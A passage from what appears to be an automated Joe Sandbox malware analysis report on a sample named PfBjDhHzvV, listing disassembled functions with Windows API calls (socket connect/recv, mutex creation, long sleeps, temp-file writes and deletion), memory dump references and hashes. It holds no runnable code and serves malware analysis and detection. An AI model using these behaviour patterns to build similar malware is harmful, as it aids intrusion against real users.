                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3734488975-0
                                                                                                                                                                                                                                    • Opcode ID: 0946b8e9b0dac643dadb30be816b816dca4c3db96294cdfff6b6de91fd67b28a
                                                                                                                                                                                                                                    • Instruction ID: 4f61d4727c97f177411858aa351de1fbf2edba824b386e2f788c78f4c7324708
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0946b8e9b0dac643dadb30be816b816dca4c3db96294cdfff6b6de91fd67b28a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CE041B95543059BFB1067B5F80EF27361557D5755F04C0A0FB06852D4D672F4308761
                                                                                                                                                                                                                                    Function 012924A1 Relevance: 5.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 012924BB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 012924DB
                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012924F3
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 012924FA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4176491614-0
                                                                                                                                                                                                                                    • Opcode ID: 50467c22baf05b566fcb8df45d9ad8a33316559b9ac806fd0a96f558d2b76dc8
                                                                                                                                                                                                                                    • Instruction ID: bdde6f32588b4f949232fdb5ef1c1bfd4f663cd8a03ef4e6839613ef371f0edc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50467c22baf05b566fcb8df45d9ad8a33316559b9ac806fd0a96f558d2b76dc8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0C979D05259DBEB348BA8E84C7DDB774EB48322F0085D5DA1992290C77459D4CF60
                                                                                                                                                                                                                                    Function 04FD015D Relevance: 4.6, APIs: 3, Instructions: 81networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,3A050002,D12A19BD,0000000A,?,?,5F327377,00003233), ref: 04FD019D
                                                                                                                                                                                                                                    • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 04FD01A9
                                                                                                                                                                                                                                    • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 04FD01C4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4fd0000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Socketconnectrecv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1489331942-0
                                                                                                                                                                                                                                    • Opcode ID: ddb2678683406a98f0e3fb1f759c619d0cbf9a522262d17b7d7d33698196387a
                                                                                                                                                                                                                                    • Instruction ID: 88813e41b05d5e488b5088ba286b0d065b12db1913d6cefcdfbfa91abc9bf847
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddb2678683406a98f0e3fb1f759c619d0cbf9a522262d17b7d7d33698196387a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611C4B1B812593EF6302AA29C47F7B395CCF467ACF140024FB45EA0C0CD92AD4181FA
                                                                                                                                                                                                                                    Function 01291CE3 Relevance: 4.5, APIs: 3, Instructions: 49stringthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282100), ref: 01291D3C
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(00000000), ref: 01291D55
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01291D80
                                                                                                                                                                                                                                      • Part of subcall function 01291060: Sleep.KERNEL32(?,?), ref: 012910BF
                                                                                                                                                                                                                                      • Part of subcall function 01291060: lstrcat.KERNEL32(?,01283D20), ref: 012910DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3899959655-0
                                                                                                                                                                                                                                    • Opcode ID: eb804b7a713e35b324c6335ac109a8377c31246a93a81260380530c74e482082
                                                                                                                                                                                                                                    • Instruction ID: a5bb710793bf56d814de694f5c089d9d64419c1184b5895be2bac3186429400d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb804b7a713e35b324c6335ac109a8377c31246a93a81260380530c74e482082
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8511C431A002189FDB25CB69DC04BEAB7B9AB58B40F0441E8F709A7290D7716A50CFA1
                                                                                                                                                                                                                                    Function 012841C6 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 01284247
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeave
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2394387412-0
                                                                                                                                                                                                                                    • Opcode ID: d424ea2a7cfb5c5f9bf7213f35be7dd68d2f4eb5124bc55094babfb886fed18f
                                                                                                                                                                                                                                    • Instruction ID: 05f576c46cc2f503fdcd3fc3a2430a5f100ff99c9eea2bfa22200f53272655b5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d424ea2a7cfb5c5f9bf7213f35be7dd68d2f4eb5124bc55094babfb886fed18f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A115A7052A24AEBDF24FF88F44879CBBB1FB41329F108158E925572C8C770AA91CB40
                                                                                                                                                                                                                                    Function 0128426A Relevance: 4.5, APIs: 3, Instructions: 40sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 012842B3
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 012842D4
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012842DE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitObjectSingleSleepThreadUserWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 295063474-0
                                                                                                                                                                                                                                    • Opcode ID: 1e7e9d9edd6965c4c35d80d09545daf31997132a6bd4727ed706816fb0b18f61
                                                                                                                                                                                                                                    • Instruction ID: 31bf78ab42ee7a72ba56d92b12f1c314d4b98580dba863b560f3bd50dc87fe7e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e7e9d9edd6965c4c35d80d09545daf31997132a6bd4727ed706816fb0b18f61
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01267062924AEBFB14FF94ED09FAD7775AB40304F108158E601672C4D7B29F50DB50
                                                                                                                                                                                                                                    Function 01292FFF Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000), ref: 0128A796
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
                                                                                                                                                                                                                                      • Part of subcall function 0128A75A: wsprintfA.USER32 ref: 0128A809
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 01293058
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 817978534-0
                                                                                                                                                                                                                                    • Opcode ID: 9153642fef1883e3914eb49500cb6c5ebdd3e6a7f73a003bc13649aa0a8fcf39
                                                                                                                                                                                                                                    • Instruction ID: 4f7f39f98ce621e808be36fcfd1e0921ffc3af18d9474cac10185777a7c54eda
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9153642fef1883e3914eb49500cb6c5ebdd3e6a7f73a003bc13649aa0a8fcf39
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7F054B5A50308FBEB24EFA4DC4EF9D7B38AB44711F108694FB056B2C0D6B1AA54C790
                                                                                                                                                                                                                                    Function 012908CE Relevance: 4.5, APIs: 3, Instructions: 26sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 012908E2
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(01299018), ref: 012908F4
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 0129090F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalFreeGlobalLeaveSectionSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2599486065-0
                                                                                                                                                                                                                                    • Opcode ID: 1b9a0f9179d942704c893abc98fd24a710a9253c31f1cba2af7f7eb0e06682bc
                                                                                                                                                                                                                                    • Instruction ID: e593f678d852d442578546120bdc2d2ac7cf69a7dd0422a7ab11482366a9577e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b9a0f9179d942704c893abc98fd24a710a9253c31f1cba2af7f7eb0e06682bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F05E75E0020ACBEF249F88E80A7FDB770FB44315F0041A9EA25A76C0D7391551CF44
                                                                                                                                                                                                                                    Function 01288BF1 Relevance: 3.9, APIs: 3, Instructions: 104sleepstringthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 01288B3E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001770), ref: 01288B8E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0001D4C0), ref: 01288BB0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01288CD2
                                                                                                                                                                                                                                    • Sleep.KERNEL32(004B001E), ref: 01288D9D
                                                                                                                                                                                                                                    • Sleep.KERNEL32(001B7740), ref: 01288DAA
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01288DD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$ExitThreadUserWritelstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664100127-0
                                                                                                                                                                                                                                    • Opcode ID: b8965a088c410af5ec4a3c678c8508c931bd9c199116172235e4c003ea9561bc
                                                                                                                                                                                                                                    • Instruction ID: b5100e626c5aaebe1f92807bbc93aa0a8b9b09b7a3e138f71b19f119a2a9d6cd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8965a088c410af5ec4a3c678c8508c931bd9c199116172235e4c003ea9561bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6041A4B0A12119CBDB79EF08DCD07E973B9FB84304F4480EAD60A96286D7346AD5CF48
                                                                                                                                                                                                                                    Function 05B306D1 Relevance: 3.3, APIs: 2, Instructions: 256sleepsynchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 05B307EB
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 05B3080E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: bbf7aabc2d1841d759f689f84dde268b4890a52d3e19537118d831e963ee1ac4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24B12A35A0028D8FEB10DF18CC49BA937A6FF44304F4849A5DC09BF2A1D375BA94CB4A
                                                                                                                                                                                                                                    Function 0128C89A Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(000001E8,00000006,00000000,00000000,00015400), ref: 0128C8D1
                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0128C900
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileView$Unmap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3282598733-0
                                                                                                                                                                                                                                    • Opcode ID: 94e77407847ad8f856c9628625c4f4ebea15f58a40049505120eaf33f9ffa58b
                                                                                                                                                                                                                                    • Instruction ID: bcdd318ef3e4fa81127e21d22f4713d0e8d524bbeff9f5b2fb2bcc3e9134230d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94e77407847ad8f856c9628625c4f4ebea15f58a40049505120eaf33f9ffa58b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F04F74E00708FBDB20DF98D949BED7BB8A744315F204195FA056B2C4D3B566A4CB54
                                                                                                                                                                                                                                    Function 0128A26E Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(00000003,00000020), ref: 0128A295
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000003), ref: 0128A29F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesDelete
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2910425767-0
                                                                                                                                                                                                                                    • Opcode ID: cedf68a26ed5679c272f2d462f339c6520a2f9f6313890cb499e2beca682d99e
                                                                                                                                                                                                                                    • Instruction ID: 4b55171dc15ed8ddd5acca1bffffbed29e996aea07ba5b52140b42927c8d6a31
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedf68a26ed5679c272f2d462f339c6520a2f9f6313890cb499e2beca682d99e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32E09270231328BBEB207A60D80AB7637586B44600F008102FA0A8B1C9E9F6F5608B80
                                                                                                                                                                                                                                    Function 01286274 Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,01282104), ref: 012862A8
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(000001EC,00000006,00000000,00000000,00008000), ref: 012862CE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CreateMappingView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3452162329-0
                                                                                                                                                                                                                                    • Opcode ID: c1605805ae9f2938bb7060349b9d3da6b61b8ac505ec39f967c36cdb08e2d77b
                                                                                                                                                                                                                                    • Instruction ID: 38c97cb11ad85b463579fb6c33ccf621ca9c162b23a3cba9f43643005664225e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1605805ae9f2938bb7060349b9d3da6b61b8ac505ec39f967c36cdb08e2d77b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0A574281300ABFB309B58FD4EB5537A8B344B38F20820DFB255A2D8C7B624D8CB54
                                                                                                                                                                                                                                    Function 012914A1 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
